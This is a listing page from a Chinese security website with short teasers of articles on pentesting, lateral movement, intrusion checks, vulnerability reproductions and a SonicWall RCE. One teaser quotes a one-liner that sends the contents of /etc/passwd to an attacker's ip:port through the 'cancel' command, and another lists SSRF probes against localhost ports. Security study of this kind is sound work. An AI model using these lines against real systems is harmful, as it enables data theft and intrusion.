etc - 第 3 | CN-SEC 中文网

安全闲碎

5分钟搭建heimdall定制导航页

平时需要管理的设备较多，或者需要访问的业务站点也比较多一般做法可能就是在浏览器里添加一堆的书签，也算是快捷访问的一种方式那是否有类似企业办公门户的那种网址导航页，站点主页点击图标就自动跳转...

08月14日245 views评论

阅读全文

11 个步骤完美排查Linux机器是否已经被入侵

原文:https://cloud.tencent.com/developer/article/18823571、入侵者可能会删除机器的日志信息，可以查看日志信息是否还存在或者是否被清空，相关命令示例：...

08月12日应急响应75 views评论

阅读全文

安全文章

实战 | 记一次艰难的任意文件下载漏洞挖掘和总结思考

0X01 前言本文的起因是在一次渗透测试中，挖掘到了一个比较奇葩的任意文件下载漏洞，鄙人的性格又比较倔，非想着从这个任意文件下载漏洞收获一些足以打入内网的成果。于是整了半天，在这个过程中也进一步加深了...

07月15日550 views评论

阅读全文

安全文章

Linux内网横向移动

免责声明本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。只供对已授权的目标使用测试，对未授权目标的测试作者不承担责任...

07月12日760 views评论

阅读全文

云安全

云原生安全入门-K8s概念与安装

点击蓝字关注我们前言之前实习的时候，旁边的小伙伴都是搞云原生安全的研究，一直想学，之前看了几个k8s的攻击面，今天从概念和安装开始系统的学一下。概念K8s集群架构组件Master (主控节点) 和 ...

07月11日35 views评论

阅读全文

程序逆向

vivotek 栈溢出漏洞复现

点击蓝字关注我们‍‍一、前言近日公司进了一批摄像头，以前还没有做过这方面的研究所以找了一个vivotek 2017年的栈溢出漏洞拿来练练手。二、固件仿真虚拟机环境：Ubuntu 20.04 gdb...

07月08日33 views评论

阅读全文

HW&HVV

HW：Linux测评

微信公众号：计算机与网络安全▼本文以Cent OS、Redhat Linux和中标麒麟等典型的Linux操作系统为例，介绍如何实施主机安全测评。其他版本的Linux操作系统与其类似。这里仍然依据等级保...

07月07日20 views评论

阅读全文

安全文章

Vulhub靶场 earth

项目地址：https://www.vulnhub.com/entry/the-planets-earth,755/一、扫描主机Nmap扫描主机发现开启了80和443端口，那么一个是http一个是htt...

07月06日25 views评论

阅读全文

安全文章

bypass payload list

→ssrf.php?url=http://127.0.0.1:22→ssrf.php?url=http://127.0.0.1:80→srf.php?url=http://127.0.0.1:443→...

07月05日34 views评论

阅读全文

安全文章

奇淫技巧:linux下无回显可将回显发送到服务器

靶机无回显的情况下可使用 cancel 来把回显发送到攻击机端cancel -u "$(cat /etc/passwd)" -h ip:port攻击机...

07月05日63 views评论

阅读全文

安全漏洞

SonicWall SSL-VPN RCE（远程命令执行）

粗茶淡饭不要紧，朋友散场没关系，兵荒马乱也无所谓…你拥有热气腾腾的灵魂，坚定不移的信念，每一天都有突破，每一步都在前进，坚持下去，沉淀下来。日子总会变好。漏洞简介SonicWallSSL-VPN 8....

06月29日540 views评论

阅读全文

安全工具

9 个实用的 Shell 拿来就用脚本实例

1、Dos 攻击防范（自动屏蔽攻击 IP）#!/bin/bashDATE=$(date +%d/%b/%Y:%H:%M)LOG_FILE=/usr/local/nginx/logs/demo...

06月29日41 views评论

阅读全文

在线咨询

微信